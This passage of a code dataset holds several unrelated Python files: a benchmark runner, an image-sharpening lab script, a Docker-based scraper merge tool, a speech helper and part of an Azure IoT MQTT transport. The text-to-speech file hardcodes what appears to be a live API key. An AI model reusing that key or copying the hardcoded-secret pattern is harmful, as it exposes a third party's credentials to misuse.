parser.add_argument('-d', '--dump', action=\"store_true\",\n help='display benchmark run results')\n parser.add_argument('--metadata', '-m', action=\"store_true\",\n help='show metadata')\n parser.add_argument('--hist', '-g', action=\"store_true\",\n help='display an histogram of samples')\n parser.add_argument('--stats', '-t', action=\"store_true\",\n help='display statistics (min, max, ...)')\n parser.add_argument(\"--affinity\", metavar=\"CPU_LIST\", default=None,\n help='Specify CPU affinity for worker processes. '\n 'This way, benchmarks can be forced to run '\n 'on a given set of CPUs to minimize run to '\n 'run variation. 
By default, worker processes '\n                                 'are pinned to isolated CPUs if isolated CPUs '\n                                 'are found.')\n        self.argparser = parser\n\n    def _calibrate_sample_func(self, sample_func):\n        stream = self._stream()\n\n        min_dt = self.args.min_time * 0.90\n        max_loops = 2 ** 32\n\n        loops = 1\n        while 1:\n            if loops > max_loops:\n                raise ValueError(\"unable to calibrate: loops=%s\" % loops)\n\n            dt = sample_func(loops)\n            if self.args.verbose:\n                print(\"calibration: %s: %s\"\n                      % (perf._format_number(loops, 'loop'),\n                         perf._format_timedelta(dt)),\n                      file=stream)\n\n            if dt >= min_dt:\n                break\n\n            loops *= 2\n\n        if self.args.verbose:\n            print(\"calibration: use %s\" % perf._format_number(loops, 'loop'),\n                  file=stream)\n\n        return loops\n\n    def _process_args(self):\n        if self.args.quiet:\n            self.args.verbose = False\n        if self.args.debug_single_sample:\n            self.args.worker = True\n\n        nprocess = self.argparser.get_default('processes')\n        nsamples = self.argparser.get_default('samples')\n        if self.args.rigorous:\n            self.args.processes = nprocess * 2\n            # self.args.samples = nsamples * 5 // 3\n        elif self.args.fast:\n            # use at least 3 processes to benchmark 3 different (randomized)\n            # hash functions\n            self.args.processes = max(nprocess // 2, 3)\n            self.args.samples = max(nsamples * 2 // 3, 2)\n        elif self.args.debug_single_sample:\n            self.args.processes = 1\n            self.args.warmups = 0\n            self.args.samples = 1\n            self.args.loops = 1\n            self.args.min_time = 1e-9\n\n        filename = self.args.json\n        if filename and os.path.exists(filename):\n            print(\"ERROR: The JSON file %r already exists\" % filename)\n            sys.exit(1)\n\n    def parse_args(self, args=None):\n        if self.args is None:\n            self.args = self.argparser.parse_args(args)\n            self._process_args()\n        return self.args\n\n    def _stream(self):\n        return sys.stderr if self.args.stdout else sys.stdout\n\n    def _range(self):\n        for warmup in six.moves.xrange(self.args.warmups):\n            yield (True, 1 + warmup)\n        for run in six.moves.xrange(self.args.samples):\n            yield (False, 1 + run)\n\n    def _cpu_affinity(self):\n        # sched_setaffinity() was added to Python 3.3\n        has_sched_setaffinity = hasattr(os, 'sched_setaffinity')\n        if not has_sched_setaffinity:\n            if psutil is not None:\n                proc = psutil.Process()\n                psutil_has_cpu_affinity = hasattr(proc, 'cpu_affinity')\n            else:\n                psutil_has_cpu_affinity = False\n\n        cpus = self.args.affinity\n        if not cpus:\n            stream = self._stream()\n\n            # --affinity option is not set: detect isolated CPUs\n            cpus = perf._get_isolated_cpus()\n            if not cpus:\n                # no isolated CPUs or unable to get the isolated CPUs\n                return\n\n            if not has_sched_setaffinity and not psutil_has_cpu_affinity:\n                # unable to pin CPUs\n                print(\"WARNING: unable to pin worker processes to \"\n                      \"isolated CPUs, CPU affinity not available\", file=stream)\n                print(\"Use Python 3.3 or newer, or install psutil dependency\",\n                      file=stream)\n                return\n\n            if self.args.verbose:\n                print(\"Pin process to isolated CPUs: %s\"\n                      % perf._format_cpu_list(cpus), file=stream)\n\n            self.args.affinity = perf._format_cpu_list(cpus)\n        else:\n            cpus = perf._parse_cpu_list(cpus)\n            if self.args.verbose:\n                print(\"Pin process to CPUs: %s\"\n                      % perf._format_cpu_list(cpus),\n                      file=self._stream())\n\n        if has_sched_setaffinity:\n            os.sched_setaffinity(0, cpus)\n        elif psutil_has_cpu_affinity:\n            proc = psutil.Process()\n            proc.cpu_affinity(cpus)\n        else:\n            print(\"ERROR: CPU affinity not available.\", file=sys.stderr)\n            print(\"Use Python 3.3 or newer, or install psutil dependency\",\n                  file=sys.stderr)\n            sys.exit(1)\n\n    def _worker(self, bench, sample_func):\n        stream = 
self._stream()\n        loops = self.args.loops\n\n        raw_samples = []\n        for is_warmup, index in self._range():\n            raw_sample = sample_func(loops)\n\n            # The most accurate time has a resolution of 1 nanosecond. We\n            # compute a difference between two timer values. When formatted to\n            # decimal, the difference can show more than 9 decimal digits after\n            # the dot. Round manually to 10^-9 to produce more compact JSON\n            # files and don't pretend to have a better resolution than 1\n            # nanosecond.\n            raw_sample = round(raw_sample, 9)\n\n            raw_samples.append(raw_sample)\n\n            if self.args.verbose:\n                text = bench._format_sample(raw_sample)\n                if is_warmup:\n                    text = \"Warmup %s: %s\" % (index, text)\n                else:\n                    text = \"Raw sample %s: %s\" % (index, text)\n                print(text, file=stream)\n\n        if self.args.verbose:\n            print(file=stream)\n\n        run = perf.Run(self.args.warmups, raw_samples,\n                       loops=loops,\n                       inner_loops=self.inner_loops)\n        bench.add_run(run)\n        self._display_result(bench, check_unstable=False)\n\n        return bench\n\n    def _main(self, sample_func):\n        start_time = perf.monotonic_clock()\n\n        self.parse_args()\n\n        self._cpu_affinity()\n\n        if self.args.loops == 0:\n            self.args.loops = self._calibrate_sample_func(sample_func)\n\n        bench = perf.Benchmark(name=self.name, metadata=self.metadata)\n\n        try:\n            if self.args.worker or self.args.debug_single_sample:\n                return self._worker(bench, sample_func)\n            else:\n                return self._spawn_workers(bench, start_time)\n        except KeyboardInterrupt:\n            print(\"Interrupted: exit\", file=sys.stderr)\n            sys.exit(1)\n\n    def bench_sample_func(self, sample_func, *args):\n        \"\"\"Benchmark sample_func(loops, *args)\n\n        The function must return the total elapsed time, not the average time\n        per loop iteration. The total elapsed time is required to be able\n        to automatically calibrate the number of loops.\n\n        perf.perf_counter() should be used to measure the elapsed time.\n        \"\"\"\n\n        if not args:\n            return self._main(sample_func)\n\n        def wrap_sample_func(loops):\n            return sample_func(loops, *args)\n\n        return self._main(wrap_sample_func)\n\n    def bench_func(self, func, *args):\n        \"\"\"Benchmark func(*args).\"\"\"\n\n        def sample_func(loops):\n            # use fast local variables\n            local_timer = perf.perf_counter\n            local_func = func\n            local_args = args\n\n            if local_args:\n                if loops != 1:\n                    range_it = range(loops)\n\n                    t0 = local_timer()\n                    for _ in range_it:\n                        local_func(*local_args)\n                    dt = local_timer() - t0\n                else:\n                    t0 = local_timer()\n                    local_func(*local_args)\n                    dt = local_timer() - t0\n            else:\n                # fast-path when func has no argument: avoid the expensive\n                # func(*args) argument unpacking\n\n                if loops != 1:\n                    range_it = range(loops)\n\n                    t0 = local_timer()\n                    for _ in range_it:\n                        local_func()\n                    dt = local_timer() - t0\n                else:\n                    t0 = local_timer()\n                    local_func()\n                    dt = local_timer() - t0\n\n            return dt\n\n        return self._main(sample_func)\n\n    def _spawn_worker(self):\n        args = []\n        args.extend(self.program_args)\n        args.extend(('--worker', '--stdout',\n                     '--samples', str(self.args.samples),\n                     '--warmups', str(self.args.warmups),\n                     '--loops', str(self.args.loops)))\n        # FIXME: pass --min-time?\n        if self.args.verbose:\n            args.append('-' + 'v' * self.args.verbose)\n        if self.args.affinity:\n            args.append('--affinity=%s' % self.args.affinity)\n\n        if self.prepare_subprocess_args:\n            self.prepare_subprocess_args(self, args)\n\n        return _bench_suite_from_subprocess(args)\n\n    def _display_result(self, bench, check_unstable=True):\n        stream = self._stream()\n        args = self.args\n\n        # Display the average +- stdev\n        if self.args.quiet:\n            
check_unstable = False\n _display_benchmark(bench,\n file=stream,\n check_unstable=check_unstable,\n metadata=args.metadata,\n dump=args.dump,\n stats=args.stats,\n hist=args.hist)\n\n stream.flush()\n if args.json_append:\n if os.path.exists(args.json_append):\n suite = perf.BenchmarkSuite.load(args.json_append)\n else:\n suite = perf.BenchmarkSuite()\n suite._add_benchmark_runs(bench)\n suite.dump(args.json_append)\n\n if args.stdout:\n try:\n bench.dump(sys.stdout)\n except IOError as exc:\n if exc.errno != errno.EPIPE:\n raise\n # ignore broken pipe error\n\n # Close stdout to avoid the warning \"Exception ignored in: ...\"\n # at exit\n try:\n sys.stdout.close()\n except IOError:\n # close() is likely to fail with EPIPE (BrokenPipeError)\n pass\n\n if args.json:\n bench.dump(args.json)\n\n def _spawn_workers(self, bench, start_time):\n verbose = self.args.verbose\n quiet = self.args.quiet\n stream = self._stream()\n nprocess = self.args.processes\n\n for process in range(nprocess):\n run_suite = self._spawn_worker()\n\n run_benchmarks = run_suite.get_benchmarks()\n if len(run_benchmarks) != 1:\n raise ValueError(\"worker produced %s benchmarks instead of 1\"\n % len(run_benchmarks))\n run_bench = run_benchmarks[0]\n\n bench._add_benchmark_runs(run_bench)\n\n if verbose:\n run = bench.get_runs()[-1]\n run_index = '%s/%s' % (1 + process, nprocess)\n _display_run(bench, run_index, run, file=stream)\n elif not quiet:\n print(\".\", end='', file=stream)\n stream.flush()\n\n if not quiet:\n print(file=stream)\n\n duration = perf.monotonic_clock() - start_time\n mins, secs = divmod(duration, 60)\n if mins:\n duration = '%.0f min %.0f sec' % (mins, secs)\n else:\n duration = '%.1f sec' % secs\n bench.add_metadata('duration', duration)\n\n self._display_result(bench)\n return bench\n","sub_path":"perf/text_runner.py","file_name":"text_runner.py","file_ext":"py","file_size_in_byte":28057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"220684769","text":"from PIL import Image\nfrom numpy import *\nfrom GaussianFilters import * \nfrom NormalImage import normalizeImage\nfrom GrayScale import saveAsGrayScale\ndef unsharpMasking(im,sigma,gain):\n result = zeros(im.shape)\n if (im.ndim)==3:\n blur = colorGaussianFilter(im,sigma)\n else:\n blur = grayGaussianFilter(im,sigma)\n im = im.astype(int)\n blur = blur.astype(int)\n blurEdge = (im - blur)*gain\n result = im + blurEdge\n result = normalizeImage(result,255)\n result = result.astype(int)\n result = array(result,'uint8')\n return result\n\ndef main():\n path = '/Users/danielvillarreal/Dropbox/School/College/Fall 2016/Computer Vision/images/'\n name = 'city_blur'\n im = array(Image.open(path + name + '.jpg').convert('L'))\n saveAsGrayScale(name,path)\n sigma = 200\n gain = 0.9\n im2 = unsharpMasking(im,sigma,gain)\n im2 = Image.fromarray(im2)\n im2.convert('RGB').save(name + 'UnsharpMasking_StdDev=' + str(sigma) + '_Gain=' + str(gain) + '.png','png')\n\nmain()\n\n\n","sub_path":"Labs/Lab1/UnsharpMaskingFilter.py","file_name":"UnsharpMaskingFilter.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"650782334","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Stop scraper, merge files, delete old files, and resume scraping.\"\"\"\n\nimport argparse\nimport logging\nimport subprocess\nimport sys\n\nfrom datetime import timedelta\nfrom pathlib import Path\nfrom time import sleep\n\nfrom pytility import 
parse_bool, parse_float\nfrom yaml import safe_load\n\nfrom .merge import merge_files\nfrom .utils import now\n\nLOGGER = logging.getLogger(__name__)\nBASE_DIR = Path(__file__).resolve().parent.parent\nFEEDS_DIR = BASE_DIR / \"feeds\"\nDATA_DIR = (BASE_DIR / \"..\" / \"board-game-data\").resolve()\n\n\ndef merge_config(\n spider, item=\"GameItem\", in_paths=None, out_path=None, full=False, **kwargs\n):\n \"\"\"Returns arguments for merging a given spider.\"\"\"\n\n curr_date = now()\n curr_date_str = curr_date.strftime(\"%Y-%m-%dT%H-%M-%S\")\n\n kwargs[\"in_paths\"] = in_paths or FEEDS_DIR / spider / item / \"*\"\n kwargs.setdefault(\"keys\", f\"{spider}_id\")\n kwargs.setdefault(\"key_types\", \"int\" if spider in (\"bgg\", \"luding\") else \"str\")\n kwargs.setdefault(\"latest\", \"scraped_at\")\n kwargs.setdefault(\"latest_types\", \"date\")\n # kwargs.setdefault(\"latest_min\", curr_date - timedelta(days=360))\n kwargs.setdefault(\"concat_output\", True)\n\n if parse_bool(full):\n kwargs[\"out_path\"] = (\n out_path or FEEDS_DIR / spider / item / f\"{curr_date_str}-merged.jl\"\n )\n\n else:\n kwargs[\"out_path\"] = out_path or DATA_DIR / \"scraped\" / f\"{spider}_{item}.jl\"\n kwargs.setdefault(\n \"fieldnames_exclude\",\n (\"published_at\", \"updated_at\", \"scraped_at\"),\n )\n kwargs.setdefault(\"sort_keys\", True)\n\n return kwargs\n\n\ndef merge_configs(spider, full=False):\n \"\"\"Yields configs for all items in a given spider.\"\"\"\n\n full = parse_bool(full)\n\n if spider == \"bga\":\n yield merge_config(spider=\"bga\", item=\"GameItem\", full=full)\n yield merge_config(\n spider=\"bga\",\n item=\"RatingItem\",\n full=full,\n keys=(\"bga_user_id\", \"bga_id\"),\n fieldnames_exclude=(\"bgg_user_play_count\",)\n if parse_bool(full)\n else (\"bgg_user_play_count\", \"published_at\", \"updated_at\", \"scraped_at\"),\n )\n return\n\n if spider == \"bgg\":\n yield merge_config(spider=\"bgg\", item=\"GameItem\", full=full)\n yield merge_config(\n spider=\"bgg\",\n item=\"UserItem\",\n full=full,\n keys=\"bgg_user_name\",\n key_types=\"istr\",\n fieldnames_exclude=None if full else (\"published_at\", \"scraped_at\"),\n )\n yield merge_config(\n spider=\"bgg\",\n item=\"RatingItem\",\n full=full,\n keys=(\"bgg_user_name\", \"bgg_id\"),\n key_types=(\"istr\", \"int\"),\n fieldnames_exclude=None if full else (\"published_at\", \"scraped_at\"),\n )\n return\n\n if spider == \"bgg_hotness\":\n yield merge_config(\n spider=\"bgg_hotness\",\n item=\"GameItem\",\n full=full,\n keys=(\"published_at\", \"bgg_id\"),\n key_types=(\"date\", \"int\"),\n latest_min=None,\n fieldnames=None\n if full\n else (\n \"published_at\",\n \"rank\",\n \"add_rank\",\n \"bgg_id\",\n \"name\",\n \"year\",\n \"image_url\",\n ),\n fieldnames_exclude=None,\n sort_keys=False,\n sort_fields=(\"published_at\", \"rank\"),\n )\n return\n\n if spider == \"bgg_rankings\":\n yield merge_config(\n spider=\"bgg_rankings\",\n item=\"GameItem\",\n full=full,\n keys=(\"published_at\", \"bgg_id\"),\n key_types=(\"date\", \"int\"),\n latest_min=now() - timedelta(days=7),\n fieldnames=None\n if full\n else (\n \"published_at\",\n \"bgg_id\",\n \"rank\",\n \"add_rank\",\n \"name\",\n \"year\",\n \"num_votes\",\n \"bayes_rating\",\n \"avg_rating\",\n ),\n fieldnames_exclude=None,\n sort_keys=False,\n sort_fields=(\"published_at\", \"rank\"),\n )\n return\n\n # TODO news merge config\n\n yield merge_config(spider=spider, item=\"GameItem\", full=full)\n\n\ndef _parse_timeout(timeout):\n if timeout is None or timeout == \"\":\n return 
None\n\n timeout_float = parse_float(timeout)\n if timeout_float is not None:\n return timeout_float\n\n try:\n import pytimeparse\n except ImportError:\n return None\n\n return pytimeparse.parse(timeout)\n\n\ndef _docker_container(name):\n try:\n import docker\n except ImportError:\n LOGGER.warning(\"Docker library is not importable\")\n return None\n\n try:\n client = docker.from_env()\n return client.containers.get(name)\n except docker.errors.NotFound:\n LOGGER.warning(\"Did not find container <%s>\", name)\n\n return None\n\n\ndef _docker_start(name):\n LOGGER.info(\"Starting container <%s>\", name)\n\n container = _docker_container(name)\n\n if container is not None:\n try:\n container.start()\n LOGGER.info(\"Started via Docker library call\")\n return True\n except Exception:\n pass\n\n try:\n subprocess.run([\"docker\", \"compose\", \"start\", name], check=True)\n LOGGER.info(\"Started via docker compose CLI call\")\n return True\n except Exception:\n pass\n\n LOGGER.warning(\"Unable to start container <%s>\", name)\n return False\n\n\ndef _docker_stop(name, timeout=None):\n LOGGER.info(\"Stopping container <%s>\", name)\n if timeout is not None:\n LOGGER.info(\"Allowing a timeout of %.1f seconds\", timeout)\n\n container = _docker_container(name)\n\n if container is not None:\n try:\n if timeout is None:\n container.stop()\n else:\n container.stop(timeout=timeout)\n LOGGER.info(\"Stopped via Docker library call\")\n return True\n except Exception:\n pass\n\n try:\n args = (\n [\"docker\", \"compose\", \"stop\", name]\n if timeout is None\n else [\"docker\", \"compose\", \"stop\", \"--timeout\", str(timeout), name]\n )\n subprocess.run(args=args, check=True)\n LOGGER.info(\"Stopped via docker compose CLI call\")\n return True\n except Exception:\n pass\n\n LOGGER.warning(\"Unable to stop container <%s>\", name)\n return False\n\n\ndef _docker_compose(path, service):\n path = Path(path).resolve()\n LOGGER.info(\"Loading service <%s> from file <%s>\", service, path)\n try:\n with open(path) as compose_file:\n config = safe_load(compose_file)\n return config[\"services\"][service]\n except Exception:\n LOGGER.exception(\"Unable to load service <%s> from file <%s>\", service, path)\n return {}\n\n\ndef _stop_merge_start(spider, compose_file, full=True, timeout=None, cool_down=None):\n scraper_name = spider.translate({ord(\"-\"): \"_\"})\n docker_name = spider.translate({ord(\"_\"): \"-\"})\n LOGGER.info(\n \"Stopping, merging, and restarting spider <%s> / <%s>\",\n scraper_name,\n docker_name,\n )\n\n docker_config = _docker_compose(path=compose_file, service=docker_name)\n container = docker_config.get(\"container_name\")\n\n if not container:\n LOGGER.error(\"Unable to find container name for spider <%s>, aborting\", spider)\n return False\n\n timeout = _parse_timeout(timeout)\n if timeout is None:\n timeout = _parse_timeout(docker_config.get(\"stop_grace_period\"))\n\n # TODO add force option\n # if not _docker_stop(name=container, timeout=timeout):\n # LOGGER.error(\"Unable to stop <%s>, aborting\", container)\n # return False\n\n _docker_stop(name=container, timeout=timeout)\n\n if cool_down:\n LOGGER.info(\"Cooling down for %d seconds...\", cool_down)\n sleep(cool_down)\n\n for config in merge_configs(spider=scraper_name, full=full):\n LOGGER.info(\"Running merge with config %r\", config)\n merge_files(**config)\n\n if cool_down:\n LOGGER.info(\"Cooling down for %d seconds...\", cool_down)\n sleep(cool_down)\n\n return _docker_start(name=container)\n\n\ndef _parse_args():\n 
parser = argparse.ArgumentParser(description=\"\")\n    parser.add_argument(\"spiders\", nargs=\"+\", help=\"\")\n    parser.add_argument(\n        \"--compose-file\", \"-c\", default=BASE_DIR / \"docker-compose.yaml\"\n    )\n    parser.add_argument(\"--timeout\", \"-t\", help=\"\")\n    parser.add_argument(\"--cool-down\", \"-d\", type=int, default=60, help=\"\")\n    parser.add_argument(\n        \"--verbose\",\n        \"-v\",\n        action=\"count\",\n        default=0,\n        help=\"log level (repeat for more verbosity)\",\n    )\n\n    return parser.parse_args()\n\n\ndef main():\n    \"\"\"Command line entry point.\"\"\"\n\n    args = _parse_args()\n\n    logging.basicConfig(\n        stream=sys.stderr,\n        level=logging.DEBUG if args.verbose > 0 else logging.INFO,\n        format=\"%(asctime)s %(levelname)-8.8s [%(name)s:%(lineno)s] %(message)s\",\n    )\n\n    LOGGER.info(args)\n\n    for spider in args.spiders:\n        try:\n            _stop_merge_start(\n                spider=spider,\n                compose_file=args.compose_file,\n                timeout=args.timeout,\n                cool_down=args.cool_down,\n            )\n        except Exception:\n            LOGGER.exception(\"There was an error when processing spider <%s>\", spider)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"board_game_scraper/full_merge.py","file_name":"full_merge.py","file_ext":"py","file_size_in_byte":9644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"618139305","text":"from gtts import gTTS\nfrom googletrans import Translator\nfrom yandex_speech import TTS\nimport requests\nimport os\nimport os.path\nimport hashlib\n\n##Speech and translator declarations\nwords = '1'\nttsfilename=\"/tmp/\" + words + \".wav\"\ntranslator = Translator()\nlanguage='ru-RU'\nkey = \"3a5d503c-d9a8-489d-a100-954294c36cf8\"\n\n\n#Text to speech converter with translation\ndef say(words):\n#    words= translator.translate(words, dest=language)\n#    words=words.text\n#    words=words.replace(\"Text, \",'',1)\n#    words=words.strip()\n    print(words)\n    md5 = hashlib.sha1(words.encode('utf-8')).hexdigest()\n    filemp3 = \"\"\n    for file in os.listdir(\"/tmp/\"):\n        if file.endswith(md5+\".wav\"):\n            filemp3 = (os.path.join(file))\n\n    if filemp3 == md5+\".wav\":\n        print (\"File already recorded\")\n        os.system(\"aplay -q /tmp/\"+ filemp3)\n        print (\"And played it back\")\n    else:\n        print (\"Generating the file\")\n        #tts = gTTS(text=words, lang=language)\n        tts = TTS(\"alyss\", \"wav\", key, lang=language,emotion=\"good\")\n        tts.generate(words)\n        words = hashlib.sha1(words.encode('utf-8')).hexdigest()\n        ttsfilename=\"/tmp/\" + words + \".wav\"\n        tts.save(ttsfilename)\n        os.system(\"aplay -q \"+ttsfilename)\n        #os.remove(ttsfilename)\n\n","sub_path":"src/tts.py","file_name":"tts.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"263088145","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\nimport logging\nfrom datetime import date\nimport six.moves.urllib as urllib\nimport six.moves.queue as queue\nfrom .mqtt_provider import MQTTProvider\nfrom transitions import Machine\nfrom azure.iot.hub.devicesdk.transport.abstract_transport import AbstractTransport\nfrom azure.iot.hub.devicesdk.transport import constant\nfrom azure.iot.hub.devicesdk.message import Message\n\n\n\"\"\"\nThe below import is for generating the state machine graph.\n\"\"\"\n# from transitions.extensions import LockedGraphMachine as Machine\n\nlogger = logging.getLogger(__name__)\n\n\"\"\"\nA note on names, design, and code flow:\n\nThis transport is a state machine which is responsible for coordinating\nseveral different things. (I would like to say that it coordinates several\nevents, but the word \"event\" is very overloaded, especially in this context,\nso I hesitate to add one more overload).\n\nIn particular, it needs to coordinate external things:\n 1. Things the caller wants to do, such as \"connect\", \"send message\", etc.\n 2. Calls into the transport provider\n 3. Completion callbacks from the transport provider.\n 4. Completion callbacks from this object into the caller.\n\nand also internal things:\n 5. The \"state\" of transport (connected, disconnected, etc).\n 6. Transitions between possible states.\n\nSince one caller-initiated action results in many different things happening, this\nclass uses the following conventions:\n\n1. Actions that the caller can initiate are all named without an underscore at the beginning,\n   such as \"connect\", \"send_message\", etc.\n\n2. All internal functions are prefixed with an underscore. This is \"the pythonic way\", but it bears repeating.\n   Internal functions are internal and should not be called by external code.\n\n3. Actions will typically trigger a state machine event. State machine triggers, which may\n   or may not change state, are all prefixed with _trig_ (_trig_connect, _trig_add_pending_action_to_queue, etc)\n   The \"_trig\" indicates that this is an operation on the state machine. _trig_* functions are also unusual in\n   that they get added to the transport object at runtime when initializing the Machine object.\n\n4. Functions which call into the provider are prefixed with \"_call_provider_\", such as _call_provider_connect.\n   These are always called as part of state machine transitions. Calls from the caller should not go directly into the\n   provider without going through the state machine.\n\n5. When the provider completes an action or receives an acknowledgement, it will call back into this object using\n   functions which are all prefixed with \"_on_provider_\", such as \"_on_provider_connect_complete\". These callback functions\n   will, most of the time, trigger additional state machine transitions by calling _trig_ functions.\n\n6. Functions which are called by the state machine as side-effects of state transitions will accept event_data objects\n   as the second parameter (after self). The event_data structure contains information about the trigger or the transition\n   which caused the side-effect.\n\n7. Callbacks from this object into caller code, when not passed in as `callback` parameters to function calls, are prefixed with\n   on_ (with no underscore), such as \"on_transport_connected'. 
Because most callbacks are passed in as function parameters,\n there are very few callbacks like this.\n\n\"\"\"\n\n\nTOPIC_POS_DEVICE = 4\nTOPIC_POS_MODULE = 6\nTOPIC_POS_INPUT_NAME = 5\n\n\nclass TransportAction(object):\n \"\"\"\n base class representing various actions that can be taken\n when the transport is connected. When the MqttTransport user\n calls a function that requires the transport to be connected,\n a TransportAction object is created and added to the action\n queue. Then, when the transport is actually connected, it\n loops through the objects in the action queue and executes them\n one by one.\n \"\"\"\n\n def __init__(self, callback):\n self.callback = callback\n\n\nclass SendMessageAction(TransportAction):\n \"\"\"\n TransportAction object used to send a telemetry message or an\n output message\n \"\"\"\n\n def __init__(self, message, callback):\n TransportAction.__init__(self, callback)\n self.message = message\n\n\nclass SubscribeAction(TransportAction):\n \"\"\"\n TransportAction object used to subscribe to a specific MQTT topic\n \"\"\"\n\n def __init__(self, topic, qos, callback):\n TransportAction.__init__(self, callback)\n self.topic = topic\n self.qos = qos\n\n\nclass UnsubscribeAction(TransportAction):\n \"\"\"\n TransportAction object used to unsubscribe from a specific MQTT topic\n \"\"\"\n\n def __init__(self, topic, callback):\n TransportAction.__init__(self, callback)\n self.topic = topic\n\n\nclass MethodReponseAction(TransportAction):\n \"\"\"\n TransportAction object used to send a method response back to the service.\n \"\"\"\n\n def __init__(self, method_response, callback):\n TransportAction.__init__(self, callback)\n self.method_response = method_response\n\n\nclass MQTTTransport(AbstractTransport):\n def __init__(self, auth_provider):\n \"\"\"\n Constructor for instantiating a transport\n :param auth_provider: The authentication provider\n \"\"\"\n AbstractTransport.__init__(self, auth_provider)\n self.topic = self._get_telemetry_topic_for_publish()\n self._mqtt_provider = None\n self.on_transport_connected = None\n self.on_transport_disconnected = None\n\n # Queue of actions that will be executed once the transport is connected.\n # Currently, we use a queue, which is FIFO, but the actual order doesn't matter\n # since each action stands on its own.\n self._pending_action_queue = queue.Queue()\n\n # Object which maps mid->callback for actions which are in flight. 
This is\n # used to call back into the caller to indicate that an action is complete.\n self._in_progress_actions = {}\n\n self._connect_callback = None\n self._disconnect_callback = None\n\n self._c2d_topic = None\n self._input_topic = None\n\n states = [\"disconnected\", \"connecting\", \"connected\", \"disconnecting\"]\n\n transitions = [\n {\n \"trigger\": \"_trig_connect\",\n \"source\": \"disconnected\",\n \"dest\": \"connecting\",\n \"after\": \"_call_provider_connect\",\n },\n {\"trigger\": \"_trig_connect\", \"source\": [\"connecting\", \"connected\"], \"dest\": None},\n {\n \"trigger\": \"_trig_provider_connect_complete\",\n \"source\": \"connecting\",\n \"dest\": \"connected\",\n \"after\": \"_execute_actions_in_queue\",\n },\n {\n \"trigger\": \"_trig_disconnect\",\n \"source\": [\"disconnected\", \"disconnecting\"],\n \"dest\": None,\n },\n {\n \"trigger\": \"_trig_disconnect\",\n \"source\": \"connected\",\n \"dest\": \"disconnecting\",\n \"after\": \"_call_provider_disconnect\",\n },\n {\n \"trigger\": \"_trig_provider_disconnect_complete\",\n \"source\": \"disconnecting\",\n \"dest\": \"disconnected\",\n },\n {\n \"trigger\": \"_trig_add_action_to_pending_queue\",\n \"source\": \"connected\",\n \"before\": \"_add_action_to_queue\",\n \"dest\": None,\n \"after\": \"_execute_actions_in_queue\",\n },\n {\n \"trigger\": \"_trig_add_action_to_pending_queue\",\n \"source\": \"connecting\",\n \"before\": \"_add_action_to_queue\",\n \"dest\": None,\n },\n {\n \"trigger\": \"_trig_add_action_to_pending_queue\",\n \"source\": \"disconnected\",\n \"before\": \"_add_action_to_queue\",\n \"dest\": \"connecting\",\n \"after\": \"_call_provider_connect\",\n },\n {\n \"trigger\": \"_trig_on_shared_access_string_updated\",\n \"source\": \"connected\",\n \"dest\": \"connecting\",\n \"after\": \"_call_provider_reconnect\",\n },\n {\n \"trigger\": \"_trig_on_shared_access_string_updated\",\n \"source\": [\"disconnected\", \"disconnecting\"],\n \"dest\": None,\n },\n ]\n\n def _on_transition_complete(event_data):\n if not event_data.transition:\n dest = \"[no transition]\"\n else:\n dest = event_data.transition.dest\n logger.info(\n \"Transition complete. Trigger=%s, Dest=%s, result=%s, error=%s\",\n event_data.event.name,\n dest,\n str(event_data.result),\n str(event_data.error),\n )\n\n self._state_machine = Machine(\n model=self,\n states=states,\n transitions=transitions,\n initial=\"disconnected\",\n send_event=True, # This has nothing to do with telemetry events. This tells the machine use event_data structures to hold transition arguments\n finalize_event=_on_transition_complete,\n queued=True,\n )\n\n # to render the state machine as a PNG:\n # 1. apt install graphviz\n # 2. pip install pygraphviz\n # 3. change import line at top of this file to import LockedGraphMachine as Machine\n # 4. uncomment the following line\n # 5. 
run this code\n        # self.get_graph().draw('mqtt_transport.png', prog='dot')\n\n        self._create_mqtt_provider()\n\n    def _call_provider_connect(self, event_data):\n        \"\"\"\n        Call into the provider to connect the transport.\n\n        This is called by the state machine as part of a state transition\n\n        :param EventData event_data: Object created by the Transitions library with information about the state transition\n        \"\"\"\n        logger.info(\"Calling provider connect\")\n        password = self._auth_provider.get_current_sas_token()\n        self._mqtt_provider.connect(password)\n\n        if hasattr(self._auth_provider, \"token_update_callback\"):\n            self._auth_provider.token_update_callback = self._on_shared_access_string_updated\n\n    def _call_provider_disconnect(self, event_data):\n        \"\"\"\n        Call into the provider to disconnect the transport.\n\n        This is called by the state machine as part of a state transition\n\n        :param EventData event_data: Object created by the Transitions library with information about the state transition\n        \"\"\"\n        logger.info(\"Calling provider disconnect\")\n        self._mqtt_provider.disconnect()\n        self._auth_provider.disconnect()\n\n    def _call_provider_reconnect(self, event_data):\n        \"\"\"\n        Call into the provider to reconnect the transport.\n\n        This is called by the state machine as part of a state transition\n\n        :param EventData event_data: Object created by the Transitions library with information about the state transition\n        \"\"\"\n        password = self._auth_provider.get_current_sas_token()\n        self._mqtt_provider.reconnect(password)\n\n    def _on_provider_connect_complete(self):\n        \"\"\"\n        Callback that is called by the provider when the connection has been established\n        \"\"\"\n        logger.info(\"_on_provider_connect_complete\")\n        self._trig_provider_connect_complete()\n\n        if self.on_transport_connected:\n            self.on_transport_connected(\"connected\")\n        callback = self._connect_callback\n        if callback:\n            self._connect_callback = None\n            callback()\n\n    def _on_provider_disconnect_complete(self):\n        \"\"\"\n        Callback that is called by the provider when the connection has been disconnected\n        \"\"\"\n        logger.info(\"_on_provider_disconnect_complete\")\n        self._trig_provider_disconnect_complete()\n\n        if self.on_transport_disconnected:\n            self.on_transport_disconnected(\"disconnected\")\n        callback = self._disconnect_callback\n        if callback:\n            self._disconnect_callback = None\n            callback()\n\n    def _on_provider_publish_complete(self, mid):\n        \"\"\"\n        Callback that is called by the provider when it receives a PUBACK from the service\n\n        :param mid: message id that was returned by the provider when `publish` was called. This is used to 